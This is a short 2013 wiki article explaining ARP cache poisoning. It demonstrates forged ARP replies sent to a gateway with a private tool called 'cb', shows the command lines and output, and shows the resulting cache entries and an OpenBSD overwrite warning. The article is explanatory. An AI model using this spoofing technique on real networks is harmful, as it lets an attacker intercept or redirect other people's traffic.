ARP poisoning

From Hackepedia
Revision as of 13:03, 7 August 2013 by Pbug (talk | contribs) (arp poison)
Jump to navigationJump to search

ARP poisoning is manipulating a computer's ARP cache in such a way that traffic from that host is redirected to another host.

A common exchange goes like this:

computer1 broadcasts who has 1.2.3.4 tell my MAC address
computer2 with 1.2.3.4 IP answers and tells computer1's 
MAC address the MAC address of it.

If now computer3 which is malicous also answers to that ARP request the computer may recognize this as an IP conflict, but doesn't have to.

Here is a program that writes arp answers to a host, it will write it twice with a different MAC address every time.

#  ./cb -a is-at -s00:11:22:33:44:55,192.168.34.99   -d192.168.34.1  -v -l re0 
--> interface_gateway: looking up gateway mac for  192.168.34.1
--> interface_gateway: resolved to mac address 0.90.b.19.56.6
--> arp reply to 00:90:0b:19:56:06 (192.168.34.1)  "192.168.34.99 is-at 00:11:22:33:44:55"
1 packet written at 60 bytes totalling 60 bytes
#  ./cb -a is-at -s00:11:22:33:44:56,192.168.34.99   -d192.168.34.1  -v -l re0 
--> interface_gateway: looking up gateway mac for 192.168.34.1
--> interface_gateway: resolved to mac address 0.90.b.19.56.6
--> arp reply to 00:90:0b:19:56:06 (192.168.34.1) "192.168.34.99 is-at 00:11:22:33:44:56"
1 packet written at 60 bytes totalling 60 bytes

Notice the MAC address of 00:11:22:33:44:55 is changed to 00:11:22:33:44:56.

At the destination computer (with IP 192.168.34.1) we can inspect the arp cache with the arp -na command:

first arp reply:
? (192.168.34.99) at 00:11:22:33:44:55 on em2
second arp reply:
? (192.168.34.99) at 00:11:22:33:44:56 on em2

The 192.168.34.99 is now said to be ARP poisoned and all traffic would go to the MAC address 00:11:22:33:44:56 instead of 00:11:22:33:44:55. Some operating systems warn of this like here on OpenBSD:

arp info overwritten for 192.168.34.99 by 00:11:22:33:44:56 on em2

I hope that helps understanding this. (BTW the cb program is not publically available and only a select number of people have it).